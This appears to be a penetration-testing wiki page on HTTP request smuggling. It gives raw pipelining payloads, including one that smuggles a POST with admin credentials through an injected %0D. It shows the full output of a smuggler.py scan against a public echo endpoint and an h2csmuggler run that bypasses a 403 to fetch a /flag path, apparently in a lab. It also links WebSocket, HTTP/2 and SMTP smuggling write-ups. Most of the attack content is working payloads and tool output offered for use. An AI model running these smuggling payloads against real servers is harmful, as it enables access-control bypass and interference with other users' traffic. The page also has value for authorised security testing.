Skip to content

Request Smuggling

Request Smuggling

Using a Forward Proxy with two different backends it may be possible to chunk a single request just right so that the single request is split into two separate requests and are sent to different backends.

Use the Burp Plugin

More Examples:
- https://medium.com/@StealthyBugs/2c43e81bcc52

Payloads

https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
Example python Pipelining code

Simple Pipelining Example:

GET /sum.jsp?a=1&b=1&c=2&d=2 HTTP/1.0
Host: example.com:8080
Connection: keep-alive

POST /sum.jsp?a=5&b=5 HTTP/1.1
Host: example.com:8080
Content-Type application/x-www-form-urlencoded
Content-Length: 7

c=6&d=6

Combined Pipelining Example:

POST /sum.jsp?a=5&b=5 HTTP/1.1
Host: example.com:8080
Content-Type application/x-www-form-urlencoded
Content-Length: 7

c=2&d=2GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0
Host: example.com:8080
Connection: keep-alive

Get with content length Pipelining Example:

GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0
Host: example.com:8080
Content-Length: 10

1234567890POST /sum.jsp?a=5&b=5 %0DContent-Type application/x-www-form-urlencoded
Host: example.com:8080
Content-Length: 30

user=admin&password=abc123

HTTP Smugling

Smuggler Script

Example:

python smuggler.py -u 'https://postman-echo.com/post?foo1=bar1&foo2=bar2'

  ______                         _              
 / _____)                       | |             
( (____  ____  _   _  ____  ____| | _____  ____ 
 \____ \|    \| | | |/ _  |/ _  | || ___ |/ ___)
 _____) ) | | | |_| ( (_| ( (_| | || ____| |    
(______/|_|_|_|____/ \___ |\___ |\_)_____)_|    
                    (_____(_____|               

     @defparam                         v1.1

[+] URL        : https://postman-echo.com/post?foo1=bar1&foo2=bar2
[+] Method     : POST
[+] Endpoint   : /post?foo1=bar1&foo2=bar2
[+] Configfile : default.py
[+] Timeout    : 5.0 seconds
[+] Cookies    : 1 (Appending to the attack)
[nameprefix1]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[tabprefix1]   : OK (TECL: 0.09 - 501) (CLTE: 0.07 - 501)
[tabprefix2]   : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[space1]       : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[midspace-01]  : OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501)
[postspace-01] : OK (TECL: 0.08 - 400) (CLTE: 0.08 - 400)
[prespace-01]  : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[endspace-01]  : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[xprespace-01] : OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400)
[endspacex-01] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[rxprespace-01]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[xnprespace-01]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacerx-01]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[endspacexn-01]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[midspace-04]  : OK (TECL: 0.07 - 501) (CLTE: 0.08 - 501)
[postspace-04] : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[prespace-04]  : OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400)
[endspace-04]  : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501)
[xprespace-04] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacex-04] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[rxprespace-04]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[xnprespace-04]: OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400)
[endspacerx-04]: OK (TECL: 0.06 - 400) (CLTE: 0.08 - 400)
[endspacexn-04]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[midspace-08]  : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501)
[postspace-08] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[prespace-08]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-08]  : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501)
[xprespace-08] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacex-08] : OK (TECL: 0.07 - 501) (CLTE: 0.08 - 501)
[rxprespace-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[xnprespace-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-08]: OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[midspace-09]  : OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501)
[postspace-09] : OK (TECL: 0.06 - 400) (CLTE: 0.06 - 400)
[prespace-09]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-09]  : OK (TECL: 0.08 - 501) (CLTE: 0.06 - 501)
[xprespace-09] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacex-09] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[rxprespace-09]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[xnprespace-09]: OK (TECL: 0.07 - 200) (CLTE: 0.06 - 200)
[endspacerx-09]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-09]: OK (TECL: 0.06 - 501) (CLTE: 0.08 - 501)
[midspace-0a]  : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[postspace-0a] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[prespace-0a]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-0a]  : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[xprespace-0a] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacex-0a] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[rxprespace-0a]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[xnprespace-0a]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-0a]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacexn-0a]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[midspace-0b]  : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[postspace-0b] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-0b]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-0b]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[xprespace-0b] : OK (TECL: 0.07 - 400) (CLTE: 0.09 - 400)
[endspacex-0b] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[rxprespace-0b]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[xnprespace-0b]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-0b]: OK (TECL: 0.07 - 400) (CLTE: 0.05 - 400)
[endspacexn-0b]: OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[midspace-0c]  : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[postspace-0c] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-0c]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-0c]  : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[xprespace-0c] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacex-0c] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[rxprespace-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[xnprespace-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacerx-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-0c]: OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[midspace-0d]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[postspace-0d] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[prespace-0d]  : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[endspace-0d]  : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[xprespace-0d] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacex-0d] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[rxprespace-0d]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[xnprespace-0d]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[endspacerx-0d]: OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[endspacexn-0d]: OK (TECL: 0.08 - 200) (CLTE: 0.06 - 200)
[midspace-1f]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[postspace-1f] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-1f]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-1f]  : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[xprespace-1f] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[endspacex-1f] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[rxprespace-1f]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[xnprespace-1f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-1f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-1f]: OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[midspace-20]  : OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[postspace-20] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-20]  : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[endspace-20]  : OK (TECL: 0.08 - 200) (CLTE: 0.07 - 200)
[xprespace-20] : OK (TECL: 0.08 - 200) (CLTE: 0.07 - 200)
[endspacex-20] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[rxprespace-20]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[xnprespace-20]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacerx-20]: OK (TECL: 0.08 - 400) (CLTE: 0.08 - 400)
[endspacexn-20]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[midspace-7f]  : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[postspace-7f] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[prespace-7f]  : OK (TECL: 0.06 - 400) (CLTE: 0.06 - 400)
[endspace-7f]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[xprespace-7f] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacex-7f] : OK (TECL: 0.06 - 501) (CLTE: 0.08 - 501)
[rxprespace-7f]: OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[xnprespace-7f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-7f]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacexn-7f]: OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501)
[midspace-a0]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[postspace-a0] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-a0]  : OK (TECL: 0.09 - 400) (CLTE: 0.07 - 400)
[endspace-a0]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[xprespace-a0] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacex-a0] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[rxprespace-a0]: OK (TECL: 0.06 - 400) (CLTE: 0.08 - 400)
[xnprespace-a0]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[endspacerx-a0]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-a0]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[midspace-ff]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[postspace-ff] : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[prespace-ff]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-ff]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[xprespace-ff] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacex-ff] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[rxprespace-ff]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[xnprespace-ff]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacerx-ff]: OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400)
[endspacexn-ff]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)

Hitting other services

https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142

WebSocket Smuggling

https://github.com/0ang3el/websocket-smuggle

HTTP/2 Request Smuggling

https://blog.assetnote.io/2021/03/18/h2c-smuggling/
https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c

Initial Request to Endpoints:

>>> curl -ik https://localhost:8001/flag
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

H2C Script:

>>> /h2csmuggler.py -x https://localhost:8001 http://backend/flag
[INFO] h2c stream established successfully.
:status: 200
content-type: text/plain; charset=utf-8
content-length: 20
date: Mon, 05 Apr 2021 18:04:54 GMT

Hello, /, http: true

[INFO] Requesting - /flag
:status: 200
content-type: text/plain; charset=utf-8
content-length: 17
date: Mon, 05 Apr 2021 18:04:54 GMT

You got the flag!

SMTP Smuggling

https://www.redpacketsecurity.com/smtp-smuggling-new-flaw-lets-attackers-bypass-security-and-spoof-emails/